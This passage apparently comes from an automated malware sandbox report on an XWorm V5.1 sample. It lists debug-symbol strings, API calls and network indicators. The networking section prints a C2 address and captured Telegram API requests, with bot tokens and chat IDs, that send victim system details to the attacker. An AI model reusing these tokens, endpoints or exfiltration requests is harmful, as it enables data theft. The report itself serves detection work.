                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb1{qm^ source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb,> source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Internals.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdbSystem.Web.Extensions.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Build.Engine.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Routing.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdbSystem.Runtime.Serialization.Formatters.dllSystem.Runtime.CompilerServices.VisualC.dllSystem.Runtime.CompilerServices.VisualC.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: CustomMarshalers.pdb.CRT$XPA source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Runtime.Remoting.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\HFayo.pdbpdbayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Net.Http.pdbu source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.STLCLR.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Device.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Numerics.Vectors.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.OracleClient.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Serialization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Remoting.pdbSystem.Runtime.Remoting.dllMicrosoft.VisualBasic.ni.dllMicrosoft.Build.Tasks.v4.0.dllSystem.Runtime.Remoting.ni.dllC:\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Log.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Reflection.Context.pdb`QR source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ComponentModel.Composition.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdbSystem.Security.Cryptography.Algorithms.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Windows\HFayo.pdbB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Build.Utilities.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb??\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Activities.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Engine.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Log.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Remoting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.ni.pdbRSDSC source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Core.pdbH source: WER2A76.tmp.dmp.6.dr
                  Source: Binary string: CustomMarshalers.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Reflection.Context.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.WebRequest.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.ServiceMoniker40.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\exe\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.Presentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.JScript.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Reflection.Context.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.Serialization.Formatters.Soap.pdbP{ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb@GN source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Services.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Activities.Build.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Mobile.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB14DCE0 FindFirstFileExW,2_2_00000142DB14DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001F28A04DCE0 FindFirstFileExW,4_2_000001F28A04DCE0
                  Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000023D0748DCE0 FindFirstFileExW,7_2_0000023D0748DCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_000002109C3CDCE0 FindFirstFileExW,12_2_000002109C3CDCE0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 23_2_00000200AB63DCE0 FindFirstFileExW,23_2_00000200AB63DCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 41_2_000001DDEEFADCE0 FindFirstFileExW,41_2_000001DDEEFADCE0
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 42_2_000001932CE9DCE0 FindFirstFileExW,42_2_000001932CE9DCE0

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 104.194.9.116
                  Uses ping.exe to check the status of other devices and networks
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.7:49713 -> 104.194.9.116:7000
                  Source: global trafficHTTP traffic detected: GET /bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845&text=%E2%98%A0%20%5BXWorm%20V5.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB83F65D83688BE31381B%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20UZK6EYLC%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20pdr326 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.7:49725 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 104.194.9.116
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 12_2_00401980 GetConsoleWindow,fopen,fopen,fscanf,fclose,_malloc_dbg,_malloc_dbg,fopen,GetVolumeInformationA,InternetOpenA,SleepEx,fgets,fclose,fopen,fclose,GetVolumeInformationA,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,12_2_00401980
                  Source: global trafficHTTP traffic detected: GET /bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845&text=%E2%98%A0%20%5BXWorm%20V5.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB83F65D83688BE31381B%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20UZK6EYLC%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20pdr326 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=6585536474&text=User%205814831126857437469%20ran%20the%20malware HTTP/1.1User-Agent: MyAppHost: api.telegram.orgCache-Control: no-cache
                  Source: unknownDNS traffic detected: queries for: api.telegram.org
                  Source: svchost.exe, 00000007.00000003.1615716729.0000023D06F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615551078.0000023D06F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000003.1615551078.0000023D06F74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3901404764.0000023D0763F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3901255269.0000023D07600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: svchost.exe, 00000007.00000002.3901404764.0000023D0763F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_S
                  Source: svchost.exe, 00000007.00000002.3901317588.0000023D07615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpose
                  Source: svchost.exe, 00000002.00000002.2466045168.00000142DB211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: svchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b92ad73
                  Source: svchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1717308062.0000023D06F84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1622716421.0000023D07679000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1482586939.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 00000007.00000003.1483104918.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1621653752.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdss
                  Source: svchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1717308062.0000023D06F84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1482586939.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdData
                  Source: svchost.exe, 00000007.00000003.1483104918.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1472186772.0000023D06F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1621653752.0000023D06F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1615838848.0000023D06F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdt
                  Source: svchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: svchost.exe, 00000007.00000002.3899970594.0000023D066D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: edb.log.2.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000003.1622108525.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1636876411.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1643671089.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scToken
                  Source: svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
                  Source: svchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900818902.0000023D06F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000003.1472186772.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuef
                  Source: svchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
                  Source: svchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: jsc.exe, 00000003.00000002.3905812861.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: svchost.exe, 00000007.00000003.3864858154.0000023D06702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.co
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                  Source: svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                  Source: svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
